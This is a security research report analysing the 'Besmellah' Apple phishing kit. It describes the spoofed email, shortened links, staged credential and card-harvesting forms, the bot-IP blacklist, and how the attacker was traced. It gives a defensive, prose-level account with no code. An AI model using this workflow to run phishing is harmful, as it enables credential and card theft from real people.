Besmellah Apple phishing kit
Introducing the campaign
In the recent past, Apple customers have been amongst the favourite targets of cyber attacks, especially in the form of phishing. Cybercriminals are generally after personal and sensible data, including bank account
details.
Last month only, the so called "Celebrity gate", also named "Fappening" has drawn significant media
attention, as the privacy of dozen international celebrities, and Apple clients, has been violated and hundreds of personal, sometimes intimate, pictures have been made public.
Media have been very quick in putting Apple under the spotlight, blaming their supposed vulnerabilities, specifically those in their "find my iPhone" feature
According to the company though, accidents were the result of specific attacks, targeting their customers
and aimed at stealing their personal and account details.
Apple has been increasingly targeted by criminals, and the recent appearance of specific, pre-packaged
"phishing kits" widely available on the internet makes companies – surely not limited to Apple only - and their
clients significantly more exposed to malicious activities.
Within this context, a new specific kit called “Besmellah” has been identified, the malicious end-to-end process analysed and the identity of the responsible revealed. The attack was successfully carried by a
young attacker, which was interested in bank accounts and credit card details of Apple customers.
Threat Analysis
The analysis of the threat shown that the attack takes place in a three-way process.
As per the common features of the “Besmellah kit”, the attack starts with a fraudulent email, sent to the recipient from an apparently legitimate support account address (support@apple.com).
In the body of the email the attacker refer to a non-specified technical issue, and recommend the recipient to follow a link in order to validate the account and avoid its closure.
In these cases the use of the “Spoofing” technique on the sender email tends to be successful as recipients are more inclined to lower the guard and trust the link. In addition, it is worth mentioning the use of the popular service of URL abbreviation called “Bitly”, to allow the malicious link to by-pass anti-phishing tool and hide the real final address of the sender.
Following the link, the victim is readdressed to a web page where it is asked to insert their account
credentials. The form and web page resemble in a great deal of details the licit ones, although the domain
used to host the web page is clearly not legitimate.
In this specific case the website used to host the pages was that of an Indian professional, previously hacked through the exploitation of CMS known vulnerabilities of WorldPress, and used to install the kit.
Once credentials are submitted an email is forwarded to the attacker.
This email contains customers’ IP address along with date and time of the submission.
As second step, the victim is asked to fill a second form and provide other key information linked to their accounts, such as name, address, phone number, driving license and credit card details (number, expiry date, CVV). As in step one, as soon as the info are submitted, the attacker receives an email with all these details plus the geo-localized IP address of the victim.
Third and last step, the victim is redirected to the legitimate domain, in this case Apple’s “itunesconnect.
apple.com”
One of the aspects that make the “Besmellah kit” very effective is the use of a blacklist of IP addresses of
the most popular search engines and Spider-bot, aiming at tracing and tracking phishing threats.
Identification of the attacker
The process to identify the attackers started from the analysis of the hacked website.
Within its architecture the presence of a zip archive has been detected the archive hosted the fully functioning kit used for the operation:
Performing a Facebook search of the email address, the association to a specific account has been identified:
The analysis of the source code revealed the email address the attacker was using to receive the account and victim’s personal info:
The analysis of the profile linked to the account allowed to discover pictures and attacker’s personal information: male, Tunisian origins, young and very interested and active in spamming and hacking
activities.
In addition, the intentions of the attacker were clear given he is part of several organizations known for their spamming activities: these groups share information as well as strategies to obtain sensitive information and launch cyber attacks.
Conclusion
The analysis of this operation once again showed how dangerous phishing activities can be. These threats are on the rise and pose a significant risk to individuals are organizations alike.
The availability in the internet of easy-to-use, pre-packaged tools such as the “Besmellah” represent a very dangerous incentive for young, maybe less experienced attackers, to commit unlawful and
dangerous activities.
To contrast these malicious activities, companies need to define and implement stricter risk management policies as well as adopt specific tools to prevent attacks, defend both their critical digital infrastructure and their customer base.